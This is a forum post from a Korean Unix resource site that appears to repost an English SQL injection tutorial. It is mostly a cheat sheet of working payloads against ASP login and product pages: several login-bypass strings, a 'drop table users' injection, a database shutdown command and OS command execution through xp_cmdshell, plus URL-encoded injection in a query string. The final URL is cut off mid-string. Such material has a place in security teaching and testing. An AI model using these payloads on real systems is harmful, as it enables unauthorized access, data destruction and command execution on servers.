BACKRUSH 유닉스명령 다음 자료실 Ascii Table 원격접속 달력,시간 프로세스 쉘

지하철노선 RFC문서 SUN FAQ SUN FAQ1 C메뉴얼 PHP메뉴얼 너구리 아스키월드 아이피서치

글쓴이: sql

Sql 인젝션

"Select * from table1 where login=' fuck ' and password=' hi' or 'a'='a ' "

통용
hi" or "a"="a
hi" or 1=1 --
hi' or 1=1 --
hi' or 'a'='a
hi') or ('a'='a
hi") or ("a"="a
또는

fuck ' --
fuck " --

Username: ' or users.userName like 'a%' ---
Password: [Anything]

Once again, this performs an injected SQL query against our users table:

select userName from users where userName='' or
users.userName like 'a%' --' and userPass=''

select 1; select 1+2; select 1+3;

...would return three recordsets. The first would contain the value 1, the
second the value 3, and the third the value 4, etc. So, if we logged in with the
following credentials:

Username: ' or 1=1; drop table users; --
Password: [Anything]

Username: '; shutdown with nowait; --
Password: [Anything]

This would make our login.asp script run the following query:

select userName from users where userName='';
shutdown with nowait; --' and userPass=''

Username: '; exec master..xp_xxx; --
Password: [Anything]

All we have to do is pick the appropriate extended stored procedure and replace
xp_xxx with its name in the sample above. For example, if IIS was installed on
the same machine as SQL Server (which is typical for small one/two man setups),
then we could restart it by using the xp_cmdshell extended stored procedure
(which executes a command string as an operating-system command) and IIS reset.
All we need to do is enter the following user credentials into our getlogin.asp
page:

Username: '; exec master..xp_cmdshell 'iisreset'; --
Password: [Anything]

This would send the following query to SQL Server:

select userName from users where userName='';
exec master..xp_cmdshell 'iisreset'; --' and userPass=''

http://localhost/products.asp?productId=0%20or%201=1

Each %20 in the URL represents a URL-encoded space character, so the URL really
looks like this:

http://localhost/products.asp?productId=0 or 1=1

When used in conjunction with products.asp, the query looks like this:

select prodName from products where id = 0 or 1=1

Using a bit of know-how and some URL-encoding, we can just as easily pull the
name of the products field from the products table:

http://localhost/products.asp?productId=0%...%20having%201=1